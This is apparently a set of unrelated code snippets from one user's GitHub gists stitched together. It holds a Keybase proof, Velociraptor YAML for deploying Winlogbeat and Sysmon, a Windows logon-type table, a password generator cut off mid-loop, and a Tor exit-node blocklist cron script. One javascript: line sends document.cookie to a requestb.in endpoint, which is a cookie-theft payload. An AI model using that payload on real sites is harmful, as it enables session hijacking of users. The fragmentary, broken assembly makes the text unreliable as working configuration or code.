I hereby claim:
- I am ecapuano on github.
- I am ecapuano (https://keybase.io/ecapuano) on keybase.
- I have a public key whose fingerprint is 2033 7875 F286 D318 5746 A2A7 27D2 E47B 52A3 720B
To claim this, I am signing this object:
name: Custom.Winlogbeat.Deploy
description: |
  Quick and dirty way to deploy Winlogbeat via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
  - name: binaryURL
    default: http://url.to/winlogbeat.exe
  - name: installPath
    default: C:\Program Files\winlogbeat
name: Custom.CapsSysmon.Deploy
description: |
  A quick and dirty way to download and install sysmon via Velociraptor
# Can be CLIENT, CLIENT_EVENT, SERVER, SERVER_EVENT
type: CLIENT
parameters:
  - name: sysmonURL
    default: http://url.to/sysmon8_64.exe
  - name: binPath
    default: C:\sysmon.exe
id | description
---|---
2 | Interactive (logon at keyboard and screen of system)
3 | Network (i.e. connection to shared folder on this computer from elsewhere on network)
4 | Batch (i.e. scheduled task)
5 | Service (Service startup)
7 | Unlock (i.e. unlocking unattended workstation)
8 | NetworkCleartext (logon with credentials sent in clear text)
9 | NewCredentials (such as with RunAs or mapping a network drive with alternate credentials)
10 | RemoteInteractive (Terminal Services, Remote Desktop or Remote Assistance)
11 | CachedInteractive (logon with cached domain credentials)
# character set to use for generating passwords
chars=abcdefghijklmnopqrstuvwxyz123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%
# how many passwords to generate
count=100
n=0
while [ $n -le $count ] ; do
    for i in {1..12} ; do #### 12 defines the max size of the passwords
javascript:var img = document.createElement('img');
img.src = "http://requestb.in/zngmupzn?cookie=" + document.cookie;
#!/bin/bash
#
# Use 'crontab -e' to create a scheduled job for this. Every 6 hours or so should be good.
# Make sure your blocking software/hardware can access the tor_nodes.txt file via HTTP / FTP / SCP / etc...
#
curl https://check.torproject.org/exit-addresses | grep ExitAddress | cut -d' ' -f2 > /var/www/html/blocklists/tor_nodes.txt